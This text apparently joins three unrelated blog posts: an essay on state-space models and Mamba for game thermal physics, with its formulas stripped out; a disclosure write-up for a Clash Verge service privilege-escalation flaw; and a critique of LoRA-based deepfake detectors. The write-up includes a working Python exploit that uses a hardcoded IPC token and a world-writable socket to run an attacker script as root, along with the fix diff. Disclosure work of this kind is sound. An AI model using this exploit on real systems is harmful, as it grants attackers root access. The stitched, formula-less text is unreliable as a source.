Paradigm Shift: From Sequential Simulation to Predictive State-Space Models

Redefining DLSS: Deep Learning Super Speed

At the architectural level, traditional engines treat the simulation grid as a linearized 1D array. To maintain logical consistency, they are forced into a strict sequential iteration—updating states cell-by-cell, tick-by-tick. While this ensures precision, it remains tethered to the clock speed of a single thread, struggling to escape the von Neumann bottleneck.

My core insight is to bridge this gap using a fundamental concept from Computer Vision. If we strip away the color channels, a simulation grid is mathematically isomorphic to a 2D tensor (e.g., a 224x224 grayscale image).

The conceptual bridge is rooted in the mathematical duality of their filtering operations (Equation 2 and Equation 3):

• CNN (Spatial Perception): Where is a kernel that perceives spatial patterns across the grid to resolve feature maps.

• SSM (Temporal Perception):

where:

• is the kernel that projects the system’s DNA across the timeline to resolve the future;
• is the input matrix, which projects the current input into a hidden state;
• is the state transition matrix. Raising it to the power of () is the mathematical magic that allows us to “fast-forward” the system’s internal state steps into the future without iterating through ;
• is the output matrix, which projects this hidden state back into our observable output.

In CV, a CNN uses its receptive field to perceive spatial patterns across an entire image in a single GPU pass. By leveraging the convolutional duality of SSMs, we can apply this same logic to time. We treat the future timeline as an additional dimension of the state tensor, effectively creating a spacetime receptive field.

Instead of waiting for to finish, we “snap” the entire temporal window into existence as a unified compute task. Causal convolutions act as the mathematical guarantee, ensuring that even in this parallel surge of computation, the information flow respects temporal entropy.

What makes this mapping worth noting is how it aligns with the engine’s actual memory layout: the flattened 1D world state becomes the sequence dimension for the SSM, turning the double loop over space and time into a single parallel scan.

In systems programming, when the physical layout matches the logical abstraction, it usually pays off in predictable performance. This is simply one of those cases.

Redefining RTX: Real-Time Temporal eXecution

That being said… does anyone even remember we just wanted to make Klei’s “magic” a bit more realistic at first? Maybe I’ve spent so much time on “DLSS” that things are getting a bit “Oxygen Not Included”, but the real point of using SSMs for Real-Time Temporal eXecution was always about restoring physical continuity from the game’s approximations.

This is a real problem I encountered: the Thermo Aquatuner (TA) in ONI. No matter what coolant is used, and regardless of the input temperature, the TA magically subtracts a constant from the flow—a discrete, rule-based leap that ignores the complexity of real-world thermal exchange. I’ve come to call this “Klei’s Magic”.

This has created an interesting phenomenon: when calculating heat transfer, the system appears almost “scientific” because it respects the Specific Heat Capacity (SHC) of the liquid (Equation 7).

where:

• is the thermal energy moved, measured in DTU/tick;

• is the liquid mass ();

• is the Specific Heat Capacity (in );

• is the constant offset.

However, as we can see, this pseudo-fidelity comes at a peculiar cost: simplifying the entire thermal evolution into a single, hard-coded constant .

The piecewise function above (Equation 8) illustrates the compromises Klei made when simulating thermal dynamics.

Assuming a naturally running, self-consistent system—and ignoring sudden chaotic inputs like player interventions—a Linear Time-Invariant (LTI) SSM can model this state machine with true mathematical continuity, gracefully replacing the brute-force subtraction of a hard-coded constant.

Instead of a discrete jump, we return to the fundamental continuous-time differential equation for heat exchange (akin to Newton’s Law of Cooling), expressed in the standard continuous State-Space form (Equation 9 and Equation 10):

where:

• is the continuous internal temperature state of the liquid;
• is the continuous thermal decay matrix (derived from thermal conductivity and SHC), governing how the temperature naturally evolves over time;
• represents the external continuous heat extraction driven by the Aquatuner;
• determines how this heat extraction influences the liquid’s temperature state;
• is the final observable output temperature .

Through discretization techniques like Zero-Order Hold (ZOH), this continuous ODE is mathematically transformed into the discrete matrices () we saw in Equation 3 of the “DLSS” section. This mathematical transformation is exactly what allows the GPU to compute the continuous cooling curve as a parallelized temporal convolution, restoring the beauty of physics without the serial CPU bottleneck.

Code

import numpy as np
import matplotlib.pyplot as plt

# Time array (0 to 60 ticks)
t = np.linspace(0, 60, 500)

# 1. Klei's Magic: 14-degree drop every 10 ticks (Hard-coded step function)
def klei_magic(t):
    drops = np.floor(t / 10)
    temp = 90 - drops * 14
    return np.maximum(temp, 20) # Cap at an arbitrary ambient 20°C

temp_klei = klei_magic(t)

# 2. Continuous LTI SSM (Newton's Cooling: h_dot = A*h)
T_env = 20
T_0 = 90
k = 0.06 # Thermal decay constant (matrix A equivalent)
temp_ssm = T_env + (T_0 - T_env) * np.exp(-k * t)

# Plotting
plt.figure(figsize=(10, 5))
plt.plot(t, temp_klei, label="Klei's Magic (Discrete -14°C Drop)", color="#ff7f0e", drawstyle="steps-post", linewidth=2.5)
plt.plot(t, temp_ssm, label="Continuous LTI SSM (Newton's Cooling)", color="#1f77b4", linewidth=2.5)

plt.title("Thermal Dynamics: Game Engine Magic vs. Continuous Physics")
plt.xlabel("Time (ticks)")
plt.ylabel("Temperature (°C)")
plt.grid(True, linestyle="--", alpha=0.6)
plt.legend()
plt.tight_layout()
plt.show()

The Modernization Refit: Injecting Chaos with Mamba

Our LTI SSM provides a mathematically rigorous foundation. Much like a classic dreadnought relies on pre-calculated trajectories to efficiently project power over vast distances, our global convolution predicts thousands of future ticks in a single computational pass. However, this architecture harbors a fundamental flaw: it assumes a completely predictable target. In technical terms, a strict LTI system inherently struggles to adapt to sudden, non-linear state transitions.

Remember my earlier caveat: “ignoring sudden chaotic inputs like player interventions”? In Oxygen Not Included, chaos is the only constant. What if a Duplicant suddenly pulls the automation wire, cutting power to our Aquatuner at ? What if the liquid temperature drops below and undergoes a phase change into ice, instantly altering the thermal decay matrix ?

Standard SSMs are constrained by their Linear Time-Invariant (LTI) nature. The matrices and are rigidly static. Once the temporal convolution kernel is compiled, the laws of physics are locked in. It simply cannot handle non-linear edge cases or the inherently unpredictable nature of player interactions.

To make our dreadnought survive modern chaotic warfare, it needs a modernization refit. We must introduce Mamba.

Mamba upgrades the classic SSM by introducing Selective State Spaces. To understand how it works, let’s look at the mathematical “diff” between the discrete recurrent update of a standard LTI SSM and Mamba’s selective variant:

• Standard LTI SSM (Static):
• Selective SSM (Dynamic):

where the matrices are no longer rigidly static, but are generated on the fly at each tick based on the current input :

• is the real-time contextual input (e.g., the current automation grid status or ambient temperature);
• and are data-dependent matrices. They selectively filter how much of the current game input enters the physical state, and how much of that state is projected to the output;
• is a data-dependent step size that fundamentally alters the state transition matrix () in real time.

This mechanism grants the system dynamic context-awareness. If the player cuts the power, can instantly drop to zero, blocking heat extraction. If the water drops below , the step size modifies to reflect the phase change into ice. Mamba effectively acts as a continuous, differentiable if-else router, gracefully handling non-linear boundary conditions without resorting to crude game-engine branching.

But here lies the ultimate technical dilemma: if our matrices change at every tick based on player inputs, we can no longer precompute the causal convolution kernel . Does this mean we fall back to the sequential CPU loop, ruining our “Logical Parallelism”?

Not at all. To preserve the firepower of the dreadnought, Mamba swaps out the causal convolution for a hardware-aware algorithm known as the Parallel Associative Scan.

If we unroll the selective recurrence from Equation 12 (assuming ), the state at time expands to:

where:

• The cumulative product represents the dynamically changing physical laws accumulating over time. It directly replaces the static matrix power from our classic LTI model;
• Because changes at every tick, this massive sequence cannot be pre-computed into a simple convolutional kernel ;
• However, because matrix multiplication is associative (i.e., ), the GPU does not have to compute this chain strictly chronologically from past to future.

Even though the state transitions are dynamic and seemingly sequential, Mamba treats them as these associative blocks (conceptually similar to a parallel prefix sum). By leveraging the GPU’s SRAM hierarchy, it computes these dynamic sequences in highly optimized parallel chunks. Thus, Mamba achieves the holy grail: it retains the blazing-fast, non-blocking parallel execution of our “DLSS” architecture, while fully embracing the unpredictable, non-linear chaos of a living game world.

Conclusion

We have evolved from deconstructing an initially unscientific “Klei magic” to exploring the bleeding-edge possibilities of GPU-native parallel physics. Much like the invention of the microwave oven—where a melted candy bar in a radar lab sparked a revolution—our frustration with a hard-coded temperature drop gave birth to a rather intriguing inquiry into State-Space Models and Mamba.

Ultimately, I hope this exploration is seen as more than just an over-engineered fix for a game mechanic. Perhaps it can serve as a small glimpse into the future of simulation. By bridging classical thermodynamics with modern AI architectures, I hope we are inching closer to the era of Physical AI—where chaos and logic might finally run in true parallel.

CVE-2026-26422: How a Vulnerable IPC Service Leads to Local Privilege Escalation(LPE) in Clash

journalctl -u clash-verge-service

Dec 22 22:06:08 Arch clash-verge-service[926]: 2025-12-22T14:06:08.939124Z  INFO clash_verge_service_ipc::core::manager: Setting permissions for "/tmp/verge/verge-mihomo.sock"
Dec 22 22:06:08 Arch clash-verge-service[926]: 2025-12-22T14:06:08.939249Z  INFO clash_verge_service_ipc::core::manager: Permissions set to 777 for "/tmp/verge/verge-mihomo.sock"

// src/lib.rs
pub static IPC_AUTH_EXPECT: &str = r#"Like as the waves make towards the pebbl'd shore, So do our minutes hasten to their end;"#;

// src/core/auth.rs
match headers.get("X-IPC-Magic") {
    Some(token) if token == IPC_AUTH_EXPECT => Ok(AuthStatus::Authorized),
    // ...
}

graph TD
    %% Entities
    Attacker["👤 Unprivileged User (even 'nobody')"]
    Service["🛡️ Clash Service (Running as Root/CAP_NET_ADMIN)"]
    Socket["🔌 IPC Socket (/tmp/.../verge-mihomo.sock)"]
    Payload["📜 Malicious Script (/tmp/pwned.sh)"]
    Kernel["⚙️ System Kernel"]

    %% Attack Steps
    Attacker -->|Step 1: Connect via 0o777 Permissions| Socket
    Attacker -->|Step 2: Inject JSON with Hardcoded Token| Socket
    Socket -->|Step 3: Forward Request| Service
    Service -->|Step 4: Execute core_path Hijacked| Payload
    Payload -->|Step 5: Run with Elevated Privileges| Kernel
    Kernel -->|Step 6: SUCCESS: uid=0 root| Attacker

    %% Styling
    style Attacker fill:#f96,stroke:#333,stroke-width:2px
    style Service fill:#69f,stroke:#333,stroke-width:2px
    style Socket fill:#fff,stroke:#f66,stroke-width:3px,stroke-dasharray: 5 5
    style Payload fill:#ff9,stroke:#333,stroke-width:1px

import socket
import json
import os

SOCK_PATH = "/tmp/verge/clash-verge-service.sock"
# The hardcoded static token found in source code (CWE-798)
TOKEN = "Like as the waves make towards the pebbl'd shore, So do our minutes hasten to their end;"
PAYLOAD_SCRIPT = "/tmp/pwned.sh"

# Step 1: Prepare the malicious payload to be executed as Root
with open(PAYLOAD_SCRIPT, "w") as f:
    f.write("#!/bin/sh\nid > /tmp/pwned_result.txt\n")
os.chmod(PAYLOAD_SCRIPT, 0o755)

# Step 2: Hijack the core_path in the configuration
payload = {
    "core_config": {
        "core_path": PAYLOAD_SCRIPT,
        "core_ipc_path": "/tmp/exploit.sock",
        "config_path": "/tmp/config.yaml",
        "config_dir": "/tmp/"
    }
}
body = json.dumps(payload)

# Step 3: Trigger the exploit via the world-writable socket
request = (
    f"POST /clash/start HTTP/1.1\r\n"
    f"X-IPC-Magic: {TOKEN}\r\n"
    f"Content-Length: {len(body)}\r\n\r\n{body}"
)

with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
    s.connect(SOCK_PATH)
    s.sendall(request.encode())
    print("[*] Instruction injected. Check /tmp/pwned_result.txt for Root status.")

src/core/manager.rs (Commit Snippet)

@@ -77,8 +77,6 @@
         let mut child_lock = self.running_child.lock().await;
         *child_lock = Some(child_guard);
 
-        self.after_start().await;
-
         Ok(())
     }
 
@@ -94,27 +92,6 @@
         Ok(())
     }
 
-    pub async fn after_start(&self) {
-        #[cfg(unix)]
-        {
-            use std::fs::Permissions;
-            use std::os::unix::fs::PermissionsExt;
-            use std::path::Path;
-            use tokio::fs;
-
-            tokio::spawn(async move {
-                tokio::time::sleep(std::time::Duration::from_millis(125)).await;
-                let target = Path::new("/tmp/verge/verge-mihomo.sock");
-                info!("Setting permissions for {:?}", target);
-                if !target.exists() {
-                    warn!("{:?} does not exist, skipping permission setting", target);
-                    return;
-                }
-                match fs::set_permissions(target, Permissions::from_mode(0o777)).await {
-                    Ok(_) => info!("Permissions set to 777 for {:?}", target),
-                    Err(e) => warn!("Failed to set permissions for {:?}: {}", target, e),
-                }
-            });
-        }
-    }
-
     pub async fn after_stop(&self) {
@@ -121,10 +98,24 @@
         set_or_update_writer(writer_config).await?;
         let shared_writer = get_writer().unwrap();
 
+        #[cfg(not(unix))]
         let child = Command::new(bin_path)
             .args(args)
             .stdout(Stdio::piped())
             .stderr(Stdio::piped())
             .spawn()?;
 
+        #[cfg(unix)]
+        let child = unsafe {
+            Command::new(bin_path)
+                .args(args)
+                .stdout(Stdio::piped())
+                .stderr(Stdio::piped())
+                .pre_exec(|| {
+                    platform_lib::umask(0o002);
+                    Ok(())
+                })
+                .spawn()?
+        };
+
         let mut child_guard = ChildGuard(Some(child));

The Additive Fallacy & Four-fold Paradox

Current pre-trained models leverage billions of images to converge through iterative optimization.

Previously, LoRA-based approaches were the predominant PEFT methods, implementing low-rank adaptation through an additive logic (Han et al. 2024). However, in my view, those could lead to model’s pre-trained knowledge being ‘hijacked’ by a disproportionately small amount of data, causing a domain shift away from the original weight distribution.

In fact, I argue that LoRA(Hu et al. 2022) is inherently trapped in a four-fold paradox:

1. From the perspective of data scale: If the data volume is sufficiently large, LoRA becomes redundant compared to full fine-tuning; if the data volume is small, it inevitably introduces severe bias and shortcut learning.

2. From the perspective of domain gap: If the target domain is close to the pre-training domain, LoRA’s low-rank updates tend to hijack and distort the optimal weight manifold, obliterating the model’s zero-shot generalization capabilities; conversely, if the domain gap is significantly large, LoRA fundamentally fails to exploit the immense parametric dividends of the base model.

We evaluated a series of SOTA architectures spanning from 2019 to 2026. This lineup tracks the field’s evolution, including Xception (Rossler et al. 2019), F3Net (Qian et al. 2020), Core (Ni et al. 2022), UCF (Yan et al. 2023), ProDet (Cheng et al. 2024), ForAda (Cui et al. 2025), Effort (Yan et al. 2025), GenD (Yermakov et al. 2026), and our proposed Lightning. The average AUC performance of these models on OpenFake(Livernoche et al. 2025)—a large-scale dataset comprising several in-the-wild text-to-image subsets—is summarized as follows.

Empirical Observation: Catastrophic Forgetting

As shown in Table 1, all iterative methods suffered from severe catastrophic forgetting when zero-shot transferring to OpenFake (after being trained on FaceForensics++).

In particular, PEFT methods based on LoRA (such as Effort, ForAda, and GenD)—which were originally designed to preserve pre-trained knowledge—have paradoxically collapsed, losing almost all the capability inherited from the pre-trained CLIP(Radford et al. 2021).

OpenFake consists of images generated by text-to-image models, which is theoretically CLIP’s forte. However, while Lightning (also based on CLIP) achieved an AUC of 0.76, other methods failed to even exceed 0.6. This stark contrast perfectly corresponds to the hypothesis we proposed earlier:

“If the target domain is close to the pre-training domain, LoRA’s low-rank updates tend to hijack and distort the optimal weight manifold, obliterating the model’s zero-shot generalization capabilities.”

Hypothesis: The Delta Steering Vector

It is well known that models with more parameters are more prone to overfitting, which is precisely why LoRA has frequently achieved success by reducing the number of trainable parameters.

Interestingly, while numerous models are still struggling to compress parameters within the LoRA framework, Lightning proposes a gradient-free closed-form solution. By having absolutely zero trainable parameters, Lightning inherently minimizes the risk of domain overfitting.

Fundamentally, generative artifact detection is not a representation learning problem; it is a Signal-to-Noise Ratio (SNR) problem.

In pre-trained Vision Transformers like CLIP, massive semantic features dominate the representation. For artifact detection, these semantics act as overwhelming background “noise” if not properly isolated. Iterative methods attempt to add parameters to navigate this noise, inevitably confusing the image content with the forensic signal (leading to overfitting).

But why navigate the noise when you can orthogonally decouple it? Instead of discarding the semantic features, we use them as a stable “Semantic Anchor” defining the authentic manifold. We then project the features into an orthogonal subspace to isolate the subtle forensic artifacts.

Appendix: Detailed SOTA Breakdown